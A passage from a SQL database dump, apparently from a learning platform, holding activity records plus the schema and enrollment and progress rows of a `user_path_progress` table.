(199, 220, 141, 1, '2026-03-03 14:40:33', '2026-03-03 14:40:53'),
(200, 56, 159, 1, '2026-03-03 15:51:36', NULL),
(201, 234, 1, 1, '2026-03-03 19:44:00', NULL),
(202, 235, 1, 1, '2026-03-03 20:13:02', NULL),
(203, 109, 82, 1, '2026-03-03 22:21:59', '2026-03-03 22:23:39'),
(204, 236, 134, 1, '2026-03-03 23:25:19', NULL),
(205, 237, 1, 1, '2026-03-03 23:25:53', NULL),
(206, 189, 7, 5, '2026-03-04 01:46:47', '2026-03-04 01:54:55'),
(207, 189, 7, 5, '2026-03-04 01:50:03', '2026-03-04 01:54:55'),
(208, 189, 7, 5, '2026-03-04 01:51:27', '2026-03-04 01:54:55'),
(209, 189, 7, 5, '2026-03-04 01:53:15', '2026-03-04 01:54:55'),
(210, 189, 7, 5, '2026-03-04 01:54:55', '2026-03-04 01:54:55'),
(211, 239, 40, 1, '2026-03-04 07:04:47', NULL),
(212, 240, 138, 1, '2026-03-04 09:35:57', '2026-03-04 09:36:42'),
(213, 241, 1, 1, '2026-03-04 16:22:18', NULL),
(214, 244, 1, 1, '2026-03-04 20:19:53', NULL),
(215, 239, 42, 1, '2026-03-04 22:47:56', '2026-03-04 22:51:43'),
(216, 245, 1, 1, '2026-03-05 04:55:30', NULL),
(217, 225, 162, 5, '2026-03-05 05:21:53', '2026-03-05 05:27:14'),
(218, 225, 162, 5, '2026-03-05 05:23:22', '2026-03-05 05:27:14'),
(219, 225, 162, 5, '2026-03-05 05:24:43', '2026-03-05 05:27:14'),
(220, 225, 162, 5, '2026-03-05 05:26:15', '2026-03-05 05:27:14'),
(221, 225, 162, 5, '2026-03-05 05:27:14', '2026-03-05 05:27:14'),
(222, 246, 1, 1, '2026-03-05 07:51:20', NULL),
(223, 195, 82, 1, '2026-03-05 08:29:19', '2026-03-05 08:30:59'),
(224, 247, 1, 1, '2026-03-05 11:37:14', NULL),
(225, 248, 1, 3, '2026-03-05 17:39:52', NULL),
(226, 215, 75, 1, '2026-03-05 18:07:05', NULL),
(227, 249, 125, 1, '2026-03-05 19:22:19', '2026-03-05 19:22:49'),
(228, 250, 1, 1, '2026-03-06 02:52:55', NULL),
(229, 251, 1, 3, '2026-03-06 04:45:23', NULL),
(230, 254, 1, 1, '2026-03-06 07:04:42', NULL),
(231, 256, 1, 1, '2026-03-06 08:30:57', NULL),
(232, 257, 135, 1, '2026-03-06 10:17:23', NULL),
(233, 258, 1, 1, '2026-03-06 15:20:34', NULL),
(234, 229, 112, 1, '2026-03-06 20:58:30', '2026-03-06 20:59:55'),
(235, 229, 138, 1, '2026-03-06 21:00:27', '2026-03-06 21:01:18'),
(236, 259, 1, 1, '2026-03-06 21:12:51', NULL),
(237, 142, 1, 2, '2026-03-07 05:16:28', NULL),
(238, 142, 1, 2, '2026-03-07 05:17:51', NULL),
(239, 232, 1, 5, '2026-03-07 08:20:36', '2026-03-07 13:56:20'),
(240, 261, 1, 1, '2026-03-07 08:27:47', NULL),
(241, 260, 1, 1, '2026-03-07 10:22:53', NULL),
(242, 232, 1, 5, '2026-03-07 12:57:07', '2026-03-07 13:56:20'),
(243, 232, 1, 5, '2026-03-07 13:51:15', '2026-03-07 13:56:20'),
(244, 232, 1, 5, '2026-03-07 13:53:28', '2026-03-07 13:56:20'),
(245, 232, 1, 5, '2026-03-07 13:56:20', '2026-03-07 13:56:20'),
(246, 232, 2, 1, '2026-03-07 13:57:28', NULL),
(247, 177, 79, 1, '2026-03-07 19:02:18', '2026-03-07 19:08:33'),
(248, 259, 56, 6, '2026-03-07 19:27:45', NULL),
(249, 259, 13, 1, '2026-03-07 21:16:09', NULL),
(250, 220, 55, 1, '2026-03-08 06:33:20', NULL),
(251, 177, 150, 1, '2026-03-08 11:18:03', '2026-03-08 11:20:12'),
(252, 109, 37, 1, '2026-03-08 12:45:38', '2026-03-08 12:46:46'),
(253, 222, 1, 1, '2026-03-08 14:04:19', NULL),
(254, 78, 143, 1, '2026-03-08 17:54:53', NULL),
(255, 189, 8, 5, '2026-03-08 22:12:30', '2026-03-09 02:59:15'),
(256, 263, 66, 1, '2026-03-08 22:33:13', NULL),
(257, 189, 8, 5, '2026-03-09 02:49:06', '2026-03-09 02:59:15'),
(258, 189, 8, 5, '2026-03-09 02:51:16', '2026-03-09 02:59:15'),
(259, 189, 8, 5, '2026-03-09 02:54:27', '2026-03-09 02:59:15'),
(260, 189, 8, 5, '2026-03-09 02:57:18', '2026-03-09 02:59:15'),
(261, 189, 8, 5, '2026-03-09 02:59:15', '2026-03-09 02:59:15'),
(262, 189, 9, 8, '2026-03-09 02:59:38', NULL),
(263, 189, 9, 8, '2026-03-09 03:01:58', NULL),
(264, 189, 9, 8, '2026-03-09 03:04:18', NULL),
(265, 189, 9, 8, '2026-03-09 03:05:43', NULL),
(266, 189, 9, 8, '2026-03-09 03:06:52', NULL),
(267, 189, 9, 8, '2026-03-09 03:08:15', NULL),
(268, 189, 9, 8, '2026-03-09 03:09:29', NULL),
(269, 189, 9, 8, '2026-03-09 03:10:56', NULL),
(270, 225, 161, 3, '2026-03-09 03:20:49', '2026-03-09 03:23:46'),
(271, 225, 161, 3, '2026-03-09 03:22:28', '2026-03-09 03:23:46'),
(272, 225, 161, 3, '2026-03-09 03:23:46', '2026-03-09 03:23:46'),
(273, 225, 164, 5, '2026-03-09 05:41:53', '2026-03-09 05:46:18'),
(274, 225, 164, 5, '2026-03-09 05:43:01', '2026-03-09 05:46:18'),
(275, 225, 164, 5, '2026-03-09 05:44:07', '2026-03-09 05:46:18'),
(276, 225, 164, 5, '2026-03-09 05:45:12', '2026-03-09 05:46:18'),
(277, 225, 164, 5, '2026-03-09 05:46:18', '2026-03-09 05:46:18'),
(278, 225, 163, 5, '2026-03-09 05:48:52', '2026-03-09 05:52:31'),
(279, 225, 163, 5, '2026-03-09 05:49:52', '2026-03-09 05:52:31'),
(280, 225, 163, 5, '2026-03-09 05:50:40', '2026-03-09 05:52:31'),
(281, 225, 163, 5, '2026-03-09 05:51:41', '2026-03-09 05:52:31'),
(282, 225, 163, 5, '2026-03-09 05:52:31', '2026-03-09 05:52:31'),
(283, 225, 160, 2, '2026-03-09 05:55:22', NULL),
(284, 264, 30, 1, '2026-03-09 09:41:46', '2026-03-09 09:42:50'),
(285, 266, 1, 1, '2026-03-09 12:23:18', NULL),
(286, 55, 1, 1, '2026-03-09 12:47:22', NULL),
(287, 195, 24, 1, '2026-03-09 20:53:23', '2026-03-09 20:55:41'),
(288, 195, 95, 1, '2026-03-09 21:00:43', '2026-03-09 21:02:27'),
(289, 34, 128, 1, '2026-03-10 01:19:33', NULL),
(290, 269, 4, 1, '2026-03-10 03:44:20', '2026-03-10 03:44:48'),
(291, 271, 1, 1, '2026-03-10 05:08:11', NULL),
(292, 251, 1, 3, '2026-03-10 05:22:50', NULL),
(293, 251, 1, 3, '2026-03-10 05:25:26', NULL),
(294, 251, 1, 3, '2026-03-10 05:28:29', NULL),
(295, 266, 108, 1, '2026-03-10 14:40:29', '2026-03-10 14:42:57'),
(296, 225, 166, 5, '2026-03-10 22:18:34', '2026-03-10 22:23:21'),
(297, 225, 166, 5, '2026-03-10 22:19:55', '2026-03-10 22:23:21'),
(298, 225, 166, 5, '2026-03-10 22:20:40', '2026-03-10 22:23:21'),
(299, 225, 166, 5, '2026-03-10 22:22:20', '2026-03-10 22:23:21'),
(300, 225, 166, 5, '2026-03-10 22:23:21', '2026-03-10 22:23:21'),
(301, 229, 1, 2, '2026-03-11 01:20:21', NULL),
(302, 229, 1, 2, '2026-03-11 01:22:29', NULL),
(303, 34, 166, 1, '2026-03-11 02:54:56', NULL),
(304, 225, 165, 5, '2026-03-11 03:20:47', '2026-03-11 03:44:56'),
(305, 225, 165, 5, '2026-03-11 03:21:50', '2026-03-11 03:44:56'),
(306, 225, 165, 5, '2026-03-11 03:23:02', '2026-03-11 03:44:56'),
(307, 225, 165, 5, '2026-03-11 03:43:39', '2026-03-11 03:44:56'),
(308, 225, 165, 5, '2026-03-11 03:44:56', '2026-03-11 03:44:56'),
(309, 177, 70, 1, '2026-03-11 07:08:58', '2026-03-11 07:09:54'),
(310, 277, 1, 1, '2026-03-11 11:47:29', NULL),
(311, 195, 95, 1, '2026-03-11 12:01:20', NULL),
(312, 279, 57, 1, '2026-03-11 13:41:48', '2026-03-11 13:43:29'),
(313, 232, 165, 5, '2026-03-11 17:51:38', '2026-03-11 17:57:53'),
(314, 232, 165, 5, '2026-03-11 17:53:44', '2026-03-11 17:57:53'),
(315, 232, 165, 5, '2026-03-11 17:55:37', '2026-03-11 17:57:53'),
(316, 232, 165, 5, '2026-03-11 17:56:13', '2026-03-11 17:57:53'),
(317, 232, 165, 5, '2026-03-11 17:57:53', '2026-03-11 17:57:53'),
(318, 102, 61, 1, '2026-03-11 20:38:06', NULL),
(319, 34, 78, 1, '2026-03-11 22:44:51', NULL),
(320, 282, 1, 1, '2026-03-11 23:46:37', NULL),
(321, 283, 1, 1, '2026-03-11 23:58:53', NULL),
(322, 284, 14, 1, '2026-03-12 04:48:50', '2026-03-12 04:50:23'),
(323, 285, 108, 1, '2026-03-12 07:20:28', '2026-03-12 07:25:26'),
(324, 285, 1, 1, '2026-03-12 07:27:36', NULL),
(325, 281, 1, 1, '2026-03-12 09:53:38', NULL),
(326, 289, 1, 1, '2026-03-12 10:05:59', NULL),
(327, 290, 1, 1, '2026-03-12 13:52:27', NULL),
(328, 290, 18, 1, '2026-03-12 15:08:59', NULL),
(329, 287, 1, 1, '2026-03-12 16:02:59', NULL),
(330, 283, 166, 5, '2026-03-12 20:09:56', '2026-03-12 20:20:53'),
(331, 283, 166, 5, '2026-03-12 20:15:07', '2026-03-12 20:20:53'),
(332, 283, 166, 5, '2026-03-12 20:17:58', '2026-03-12 20:20:53'),
(333, 283, 166, 5, '2026-03-12 20:19:56', '2026-03-12 20:20:53'),
(334, 283, 166, 5, '2026-03-12 20:20:53', '2026-03-12 20:20:53'),
(335, 34, 118, 1, '2026-03-12 22:00:22', NULL),
(336, 182, 123, 1, '2026-03-13 02:32:26', NULL),
(337, 102, 95, 1, '2026-03-13 10:06:25', NULL),
(378, 283, 179, 5, '2026-03-15 20:17:28', '2026-03-15 20:36:10'),
(339, 248, 1, 3, '2026-03-13 13:32:23', NULL),
(340, 248, 1, 3, '2026-03-13 13:40:59', NULL),
(341, 232, 161, 3, '2026-03-13 16:22:18', '2026-03-14 04:35:08'),
(342, 180, 62, 1, '2026-03-13 18:04:38', '2026-03-13 18:05:21'),
(343, 248, 1, 3, '2026-03-13 21:40:22', NULL),
(344, 232, 161, 3, '2026-03-14 04:34:04', '2026-03-14 04:35:08'),
(345, 232, 161, 3, '2026-03-14 04:35:08', '2026-03-14 04:35:08'),
(346, 99, 141, 1, '2026-03-14 07:37:09', NULL),
(347, 296, 8, 1, '2026-03-14 16:34:55', '2026-03-14 16:35:45'),
(348, 297, 1, 1, '2026-03-14 16:38:17', NULL),
(349, 232, 160, 5, '2026-03-14 16:41:24', NULL),
(350, 232, 160, 5, '2026-03-14 16:42:02', NULL),
(351, 232, 160, 5, '2026-03-14 16:42:29', NULL),
(352, 232, 160, 5, '2026-03-14 16:43:07', NULL),
(353, 229, 156, 1, '2026-03-14 18:02:15', '2026-03-14 18:04:20'),
(354, 298, 1, 1, '2026-03-14 18:38:47', NULL),
(355, 296, 1, 1, '2026-03-14 21:29:35', NULL),
(356, 296, 166, 1, '2026-03-14 21:33:53', NULL),
(357, 300, 1, 1, '2026-03-14 23:29:22', NULL),
(358, 187, 25, 1, '2026-03-15 03:13:10', '2026-03-15 03:14:58'),
(359, 177, 73, 1, '2026-03-15 04:18:37', '2026-03-15 04:21:53'),
(360, 78, 119, 1, '2026-03-15 05:42:51', NULL),
(377, 283, 179, 5, '2026-03-15 20:07:37', '2026-03-15 20:36:10'),
(362, 266, 1, 1, '2026-03-15 14:44:25', NULL),
(363, 303, 1, 5, '2026-03-15 17:13:19', '2026-03-15 17:56:13'),
(364, 304, 1, 1, '2026-03-15 17:29:01', NULL),
(365, 303, 1, 5, '2026-03-15 17:49:09', '2026-03-15 17:56:13'),
(366, 303, 1, 5, '2026-03-15 17:51:04', '2026-03-15 17:56:13'),
(367, 303, 1, 5, '2026-03-15 17:53:04', '2026-03-15 17:56:13'),
(368, 303, 1, 5, '2026-03-15 17:54:52', '2026-03-15 17:56:13'),
(369, 305, 69, 1, '2026-03-15 17:56:02', '2026-03-15 17:57:35'),
(370, 303, 1, 5, '2026-03-15 17:56:13', '2026-03-15 17:56:13'),
(371, 303, 2, 4, '2026-03-15 17:56:25', '2026-03-15 18:00:55'),
(372, 303, 2, 4, '2026-03-15 17:57:42', '2026-03-15 18:00:55'),
(373, 303, 2, 4, '2026-03-15 17:58:57', '2026-03-15 18:00:55'),
(374, 303, 2, 4, '2026-03-15 17:59:57', '2026-03-15 18:00:55'),
(375, 303, 2, 4, '2026-03-15 18:00:55', '2026-03-15 18:00:55'),
(376, 303, 3, 1, '2026-03-15 18:01:05', NULL),
(379, 283, 179, 5, '2026-03-15 20:25:56', '2026-03-15 20:36:10'),
(380, 283, 179, 5, '2026-03-15 20:32:32', '2026-03-15 20:36:10'),
(381, 283, 179, 5, '2026-03-15 20:35:15', '2026-03-15 20:36:10'),
(382, 283, 179, 5, '2026-03-15 20:36:10', '2026-03-15 20:36:10'),
(383, 283, 193, 4, '2026-03-15 20:39:12', NULL),
(384, 283, 193, 4, '2026-03-15 20:41:39', NULL),
(385, 283, 193, 4, '2026-03-15 20:43:16', NULL),
(386, 283, 193, 4, '2026-03-15 20:44:55', NULL),
(387, 28, 1, 3, '2026-03-15 21:09:16', NULL),
(388, 28, 1, 3, '2026-03-15 21:12:22', NULL),
(389, 28, 1, 3, '2026-03-15 21:14:03', NULL),
(390, 28, 1, 3, '2026-03-15 21:15:06', NULL);

-- --------------------------------------------------------

--
-- Table structure for table `user_path_progress`
--

CREATE TABLE `user_path_progress` (
  `id` int(11) NOT NULL,
  `user_id` int(11) NOT NULL,
  `learning_path_id` int(11) NOT NULL,
  `enrolled_at` timestamp NULL DEFAULT current_timestamp(),
  `completed_at` timestamp NULL DEFAULT NULL,
  `percentage_completed` decimal(5,2) DEFAULT 0.00,
  `current_module_id` int(11) DEFAULT NULL,
  `created_at` timestamp NULL DEFAULT current_timestamp(),
  `updated_at` timestamp NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `certificate_id` varchar(255) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `user_path_progress`
--

INSERT INTO `user_path_progress` (`id`, `user_id`, `learning_path_id`, `enrolled_at`, `completed_at`, `percentage_completed`, `current_module_id`, `created_at`, `updated_at`, `certificate_id`) VALUES
(1, 34, 1, '2025-12-26 00:53:30', NULL, 29.55, NULL, '2025-12-26 00:53:30', '2025-12-26 20:46:41', NULL),
(2, 34, 2, '2025-12-26 02:54:35', NULL, 1.33, NULL, '2025-12-26 02:54:35', '2025-12-26 21:14:00', NULL),
(3, 34, 3, '2025-12-26 03:17:44', NULL, 0.00, NULL, '2025-12-26 03:17:44', '2025-12-26 03:17:44', NULL),
(5, 34, 4, '2025-12-26 03:17:47', NULL, 0.00, NULL, '2025-12-26 03:17:47', '2025-12-26 03:17:47', NULL),
(8, 1, 2, '2025-12-26 10:00:57', NULL, 0.00, NULL, '2025-12-26 10:00:57', '2025-12-26 10:00:57', NULL),
(10, 1, 4, '2025-12-26 14:08:00', NULL, 0.00, NULL, '2025-12-26 14:08:00', '2025-12-26 14:08:00', NULL),
(11, 1, 3, '2025-12-26 14:09:43', NULL, 0.00, NULL, '2025-12-26 14:09:43', '2025-12-26 14:09:43', NULL),
(12, 1, 1, '2025-12-26 15:33:20', NULL, 0.00, NULL, '2025-12-26 15:33:20', '2025-12-26 15:33:20', NULL),
(13, 34, 5, '2025-12-26 17:59:48', NULL, 8.00, NULL, '2025-12-26 17:59:48', '2025-12-29 03:18:58', NULL),
(14, 1, 5, '2025-12-27 03:06:50', NULL, 0.00, NULL, '2025-12-27 03:06:50', '2025-12-29 03:18:58', NULL),
(15, 39, 5, '2025-12-27 03:56:25', NULL, 0.00, NULL, '2025-12-27 03:56:25', '2025-12-29 03:18:58', NULL),
(16, 40, 5, '2025-12-27 04:13:07', NULL, 0.00, NULL, '2025-12-27 04:13:07', '2025-12-29 03:18:58', NULL),
(17, 40, 1, '2025-12-27 04:19:13', NULL, 0.00, NULL, '2025-12-27 04:19:13', '2025-12-27 04:19:13', NULL),
(18, 41, 5, '2025-12-27 10:28:37', NULL, 0.00, NULL, '2025-12-27 10:28:37', '2025-12-29 03:18:58', NULL),
(19, 42, 5, '2025-12-27 11:49:51', NULL, 0.00, NULL, '2025-12-27 11:49:51', '2025-12-29 03:18:58', NULL),
(20, 42, 1, '2025-12-27 12:42:27', NULL, 28.57, NULL, '2025-12-27 12:42:27', '2025-12-30 13:53:51', NULL),
(23, 44, 5, '2025-12-27 20:59:19', NULL, 0.00, NULL, '2025-12-27 20:59:19', '2025-12-29 03:18:58', NULL),
(24, 44, 1, '2025-12-27 21:00:51', NULL, 0.00, NULL, '2025-12-27 21:00:51', '2025-12-27 21:00:51', NULL),
(25, 45, 5, '2025-12-28 17:13:10', NULL, 0.00, NULL, '2025-12-28 17:13:10', '2025-12-29 03:18:58', NULL),
(26, 45, 4, '2025-12-28 17:13:28', NULL, 0.00, NULL, '2025-12-28 17:13:28', '2025-12-28 17:13:28', NULL),
(30, 49, 5, '2025-12-28 19:54:53', NULL, 0.00, NULL, '2025-12-28 19:54:53', '2025-12-29 03:18:58', NULL),
(31, 50, 5, '2025-12-28 21:32:20', NULL, 0.00, NULL, '2025-12-28 21:32:20', '2025-12-29 03:18:58', NULL),
(32, 51, 5, '2025-12-28 21:55:58', NULL, 0.00, NULL, '2025-12-28 21:55:58', '2025-12-29 03:18:58', NULL),
(35, 51, 1, '2025-12-28 22:32:39', NULL, 0.00, NULL, '2025-12-28 22:32:39', '2025-12-28 22:32:39', NULL),
(36, 52, 5, '2025-12-29 00:28:27', NULL, 0.00, NULL, '2025-12-29 00:28:27', '2025-12-29 03:18:58', NULL),
(44, 52, 1, '2025-12-29 08:09:40', NULL, 0.00, NULL, '2025-12-29 08:09:40', '2025-12-29 08:09:40', NULL),
(45, 1, 6, '2025-12-29 13:51:54', NULL, 3.85, NULL, '2025-12-29 13:51:54', '2025-12-29 13:53:27', NULL),
(46, 1, 9, '2025-12-29 16:24:12', NULL, 0.00, NULL, '2025-12-29 16:24:12', '2025-12-29 16:24:12', NULL),
(47, 54, 9, '2025-12-29 21:29:25', NULL, 0.00, NULL, '2025-12-29 21:29:25', '2025-12-29 21:29:25', NULL),
(48, 54, 1, '2025-12-29 22:40:53', NULL, 0.00, NULL, '2025-12-29 22:40:53', '2025-12-29 22:40:53', NULL),
(49, 55, 9, '2025-12-31 01:11:23', NULL, 0.00, NULL, '2025-12-31 01:11:23', '2025-12-31 01:11:23', NULL),
(50, 56, 9, '2025-12-31 07:24:05', NULL, 0.00, NULL, '2025-12-31 07:24:05', '2025-12-31 07:24:05', NULL),
(52, 56, 4, '2025-12-31 07:27:27', NULL, 0.00, NULL, '2025-12-31 07:27:27', '2025-12-31 07:27:27', NULL),
(53, 56, 6, '2025-12-31 07:28:39', NULL, 0.00, NULL, '2025-12-31 07:28:39', '2025-12-31 07:28:39', NULL),
(54, 56, 2, '2025-12-31 07:28:43', NULL, 0.00, NULL, '2025-12-31 07:28:43', '2025-12-31 07:28:43', NULL),
(55, 58, 9, '2025-12-31 14:33:15', NULL, 0.00, NULL, '2025-12-31 14:33:15', '2025-12-31 14:33:15', NULL),
(57, 60, 9, '2026-01-02 00:49:19', NULL, 0.00, NULL, '2026-01-02 00:49:19', '2026-01-02 00:49:19', NULL),
(58, 61, 9, '2026-01-02 06:46:42', NULL, 0.00, NULL, '2026-01-02 06:46:42', '2026-01-02 06:46:42', NULL),
(59, 61, 1, '2026-01-02 06:49:58', NULL, 0.00, NULL, '2026-01-02 06:49:58', '2026-01-02 06:49:58', NULL),
(60, 62, 9, '2026-01-02 11:36:35', NULL, 0.00, NULL, '2026-01-02 11:36:35', '2026-01-02 11:36:35', NULL),
(62, 64, 9, '2026-01-03 21:32:47', NULL, 0.00, NULL, '2026-01-03 21:32:47', '2026-01-03 21:32:47', NULL),
(63, 49, 1, '2026-01-04 22:28:44', NULL, 0.00, NULL, '2026-01-04 22:28:44', '2026-01-04 22:28:44', NULL),
(64, 61, 4, '2026-01-05 11:09:23', NULL, 0.00, NULL, '2026-01-05 11:09:23', '2026-01-05 11:09:23', NULL),
(65, 34, 9, '2026-01-06 00:39:27', NULL, 27.27, NULL, '2026-01-06 00:39:27', '2026-02-05 19:28:01', NULL),
(66, 65, 9, '2026-01-06 06:39:55', NULL, 0.00, NULL, '2026-01-06 06:39:55', '2026-01-06 06:39:55', NULL),
(67, 65, 3, '2026-01-06 06:49:34', NULL, 0.00, NULL, '2026-01-06 06:49:34', '2026-01-06 06:49:34', NULL),
(68, 65, 4, '2026-01-06 06:56:51', NULL, 0.00, NULL, '2026-01-06 06:56:51', '2026-01-06 06:56:51', NULL),
(69, 65, 1, '2026-01-06 07:02:18', NULL, 2.38, NULL, '2026-01-06 07:02:18', '2026-01-06 16:28:31', NULL),
(70, 65, 2, '2026-01-06 07:02:49', NULL, 0.00, NULL, '2026-01-06 07:02:49', '2026-01-06 07:02:49', NULL),
(71, 65, 6, '2026-01-06 08:12:49', NULL, 0.00, NULL, '2026-01-06 08:12:49', '2026-01-06 08:12:49', NULL),
(73, 67, 9, '2026-01-07 03:07:05', NULL, 0.00, NULL, '2026-01-07 03:07:05', '2026-01-07 03:07:05', NULL),
(74, 68, 9, '2026-01-07 15:58:56', NULL, 0.00, NULL, '2026-01-07 15:58:56', '2026-01-07 15:58:56', NULL),
(75, 68, 1, '2026-01-07 16:03:06', NULL, 0.00, NULL, '2026-01-07 16:03:06', '2026-01-07 16:03:06', NULL),
(77, 70, 9, '2026-01-08 14:51:54', NULL, 0.00, NULL, '2026-01-08 14:51:54', '2026-01-08 14:51:54', NULL),
(78, 71, 9, '2026-01-10 06:32:03', NULL, 0.00, NULL, '2026-01-10 06:32:03', '2026-01-10 06:32:03', NULL),
(79, 72, 9, '2026-01-10 14:11:37', NULL, 0.00, NULL, '2026-01-10 14:11:37', '2026-01-10 14:11:37', NULL),
(80, 72, 1, '2026-01-10 14:19:22', NULL, 0.00, NULL, '2026-01-10 14:19:22', '2026-01-10 14:19:22', NULL),
(81, 74, 9, '2026-01-12 06:23:29', NULL, 0.00, NULL, '2026-01-12 06:23:29', '2026-01-12 06:23:29', NULL),
(82, 74, 1, '2026-01-12 06:28:49', NULL, 11.90, NULL, '2026-01-12 06:28:49', '2026-01-17 08:41:02', NULL),
(83, 74, 4, '2026-01-12 06:34:41', NULL, 0.00, NULL, '2026-01-12 06:34:41', '2026-01-12 06:34:41', NULL),
(84, 74, 2, '2026-01-12 06:48:04', NULL, 1.54, NULL, '2026-01-12 06:48:04', '2026-01-12 06:52:12', NULL),
(85, 74, 3, '2026-01-12 06:52:55', NULL, 0.00, NULL, '2026-01-12 06:52:55', '2026-01-12 06:52:55', NULL),
(86, 74, 6, '2026-01-12 06:54:50', NULL, 0.00, NULL, '2026-01-12 06:54:50', '2026-01-12 06:54:50', NULL),
(89, 77, 9, '2026-01-14 00:44:04', NULL, 0.00, NULL, '2026-01-14 00:44:04', '2026-01-14 00:44:04', NULL),
(90, 78, 9, '2026-01-14 03:21:01', NULL, 0.00, NULL, '2026-01-14 03:21:01', '2026-01-14 03:21:01', NULL),
(91, 79, 9, '2026-01-15 22:38:58', NULL, 0.00, NULL, '2026-01-15 22:38:58', '2026-01-15 22:38:58', NULL),
(95, 83, 9, '2026-01-16 00:10:32', NULL, 0.00, NULL, '2026-01-16 00:10:32', '2026-01-16 00:10:32', NULL),
(96, 84, 9, '2026-01-16 00:13:19', NULL, 0.00, NULL, '2026-01-16 00:13:19', '2026-01-16 00:13:19', NULL),
(97, 85, 9, '2026-01-16 13:32:57', NULL, 0.00, NULL, '2026-01-16 13:32:57', '2026-01-16 13:32:57', NULL),
(98, 86, 9, '2026-01-16 18:33:57', NULL, 0.00, NULL, '2026-01-16 18:33:57', '2026-01-16 18:33:57', NULL),
(100, 88, 9, '2026-01-18 15:25:44', NULL, 0.00, NULL, '2026-01-18 15:25:44', '2026-01-18 15:25:44', NULL),
(101, 89, 9, '2026-01-20 00:24:47', NULL, 0.00, NULL, '2026-01-20 00:24:47', '2026-01-20 00:24:47', NULL),
(103, 91, 9, '2026-01-20 10:34:28', NULL, 0.00, NULL, '2026-01-20 10:34:28', '2026-01-20 10:34:28', NULL),
(104, 91, 6, '2026-01-20 10:42:41', NULL, 0.00, NULL, '2026-01-20 10:42:41', '2026-01-20 10:42:41', NULL),
(106, 93, 9, '2026-01-20 20:53:45', NULL, 0.00, NULL, '2026-01-20 20:53:45', '2026-01-20 20:53:45', NULL),
(107, 94, 9, '2026-01-21 01:56:47', NULL, 0.00, NULL, '2026-01-21 01:56:47', '2026-01-21 01:56:47', NULL),
(108, 94, 1, '2026-01-21 01:58:13', NULL, 0.00, NULL, '2026-01-21 01:58:13', '2026-01-21 01:58:13', NULL),
(109, 95, 9, '2026-01-21 17:16:55', NULL, 0.00, NULL, '2026-01-21 17:16:55', '2026-01-21 17:16:55', NULL),
(110, 95, 4, '2026-01-21 18:33:45', NULL, 0.00, NULL, '2026-01-21 18:33:45', '2026-01-21 18:33:45', NULL),
(111, 95, 1, '2026-01-21 18:34:31', NULL, 0.00, NULL, '2026-01-21 18:34:31', '2026-01-21 18:34:31', NULL),
(112, 96, 9, '2026-01-22 04:10:46', NULL, 0.00, NULL, '2026-01-22 04:10:46', '2026-01-22 04:10:46', NULL),
(113, 97, 9, '2026-01-25 05:03:59', NULL, 0.00, NULL, '2026-01-25 05:03:59', '2026-01-25 05:03:59', NULL),
(114, 98, 9, '2026-01-25 08:17:43', NULL, 0.00, NULL, '2026-01-25 08:17:43', '2026-01-25 08:17:43', NULL),
(115, 98, 1, '2026-01-25 08:39:22', NULL, 0.00, NULL, '2026-01-25 08:39:22', '2026-01-25 08:39:22', NULL),
(116, 99, 9, '2026-01-25 15:12:11', NULL, 0.00, NULL, '2026-01-25 15:12:11', '2026-01-25 15:12:11', NULL),
(117, 100, 9, '2026-01-25 19:36:46', NULL, 0.00, NULL, '2026-01-25 19:36:46', '2026-01-25 19:36:46', NULL),
(118, 101, 9, '2026-01-25 21:03:19', NULL, 0.00, NULL, '2026-01-25 21:03:19', '2026-01-25 21:03:19', NULL),
(119, 102, 9, '2026-01-25 21:54:58', NULL, 0.00, NULL, '2026-01-25 21:54:58', '2026-01-25 21:54:58', NULL),
(120, 103, 9, '2026-01-26 01:31:17', NULL, 0.00, NULL, '2026-01-26 01:31:17', '2026-01-26 01:31:17', NULL),
(122, 105, 9, '2026-01-26 03:43:19', NULL, 0.00, NULL, '2026-01-26 03:43:19', '2026-01-26 03:43:19', NULL),
(123, 106, 9, '2026-01-26 04:14:59', NULL, 0.00, NULL, '2026-01-26 04:14:59', '2026-01-26 04:14:59', NULL),
(124, 107, 9, '2026-01-27 19:39:38', NULL, 0.00, NULL, '2026-01-27 19:39:38', '2026-01-27 19:39:38', NULL),
(125, 108, 9, '2026-01-27 19:55:48', NULL, 0.00, NULL, '2026-01-27 19:55:48', '2026-01-27 19:55:48', NULL),
(126, 108, 1, '2026-01-27 19:56:32', NULL, 0.00, NULL, '2026-01-27 19:56:32', '2026-01-27 19:56:32', NULL),
(127, 107, 1, '2026-01-27 19:56:48', NULL, 11.90, NULL, '2026-01-27 19:56:48', '2026-02-02 15:27:10', NULL),
(128, 109, 9, '2026-01-27 21:06:54', NULL, 0.00, NULL, '2026-01-27 21:06:54', '2026-01-27 21:06:54', NULL),
(129, 107, 3, '2026-01-28 14:33:42', NULL, 0.00, NULL, '2026-01-28 14:33:42', '2026-01-28 14:33:42', NULL),
(130, 110, 9, '2026-01-30 13:36:09', NULL, 0.00, NULL, '2026-01-30 13:36:09', '2026-01-30 13:36:09', NULL),
(131, 111, 9, '2026-01-30 14:52:08', NULL, 0.00, NULL, '2026-01-30 14:52:08', '2026-01-30 14:52:08', NULL),
(132, 112, 9, '2026-01-30 14:53:28', NULL, 0.00, NULL, '2026-01-30 14:53:28', '2026-01-30 14:53:28', NULL),
(133, 113, 9, '2026-01-30 14:55:24', NULL, 0.00, NULL, '2026-01-30 14:55:24', '2026-01-30 14:55:24', NULL),
(134, 114, 9, '2026-01-30 14:57:24', NULL, 0.00, NULL, '2026-01-30 14:57:24', '2026-01-30 14:57:24', NULL),
(135, 115, 9, '2026-01-31 12:37:56', NULL, 0.00, NULL, '2026-01-31 12:37:56', '2026-01-31 12:37:56', NULL),
(136, 116, 9, '2026-02-01 09:06:04', NULL, 0.00, NULL, '2026-02-01 09:06:04', '2026-02-01 09:06:04', NULL),
(137, 116, 4, '2026-02-01 09:07:29', NULL, 0.00, NULL, '2026-02-01 09:07:29', '2026-02-01 09:07:29', NULL),
(138, 116, 2, '2026-02-01 09:08:21', NULL, 0.00, NULL, '2026-02-01 09:08:21', '2026-02-01 09:08:21', NULL),
(139, 116, 3, '2026-02-01 09:08:38', NULL, 0.00, NULL, '2026-02-01 09:08:38', '2026-02-01 09:08:38', NULL),
(140, 116, 1, '2026-02-01 09:08:49', NULL, 0.00, NULL, '2026-02-01 09:08:49', '2026-02-01 09:08:49', NULL),
(141, 117, 9, '2026-02-01 16:19:53', NULL, 0.00, NULL, '2026-02-01 16:19:53', '2026-02-01 16:19:53', NULL),
